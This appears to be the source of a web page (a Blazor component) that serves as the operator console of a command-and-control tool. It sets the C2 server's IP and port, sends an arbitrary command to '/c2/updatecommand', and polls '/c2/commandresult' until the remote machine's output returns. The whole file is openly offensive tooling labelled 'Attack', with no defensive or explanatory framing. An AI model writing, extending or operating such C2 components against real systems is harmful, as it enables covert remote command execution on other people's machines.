@page "/"

<PageTitle>Attack</PageTitle>

@using Remote.Data
@inject RestService Rest

<style>
	textarea {
		width: 100%;
		height: 150px;
		padding: 12px 20px;
		box-sizing: border-box;
		border: 2px solid #ccc;
		border-radius: 4px;
		background-color: #f8f8f8;
		font-size: 16px;
		resize: none;
	}
</style>

<h1>Remote command page</h1>

<div>
	<h3>Set C2 IP Address</h3>
	<input @bind="target_ip" class="form-control" /> 
	<br />
	<h3>Set C2 Port</h3>
	<input @bind="target_port" class="form-control" />
	<p>(test)target ip: @Rest.targetip, target port: @Rest.targetport</p>
	<button @onclick="SetTarget" class="btn btn-primary">set target</button>
</div>

<hr />

<div>
	<h3>Remote Command</h3>
	<input @bind="remote_command" class="form-control" />
	<br />
	<button @onclick="CommandPost" class="btn btn-primary">execute</button>
	<br /><br />
	<textarea readonly>@result</textarea>
</div>
<br />



@code {
	private string? target_ip = "192.168.98.128";
	private string? target_port = "3232";
	private string? remote_command;
	private string? result = "initial result";


	void SetTarget(){
		Rest.targetip = target_ip;
		Rest.targetport = target_port;
	}

	void CommandPost(){
		if (String.IsNullOrEmpty(remote_command)){
			return;
		}
		Rest.targetcommand = remote_command;
		//remote_command = "";

		Rest.Post("/c2/updatecommand");
		while (String.IsNullOrEmpty(Rest.targetcommandresult))
		{
			Rest.Get("/c2/commandresult");
		}
		// get commandresult in Rest.targetcommandresult
		result = Rest.targetcommandresult;
		Rest.targetcommandresult = "";

	}
}

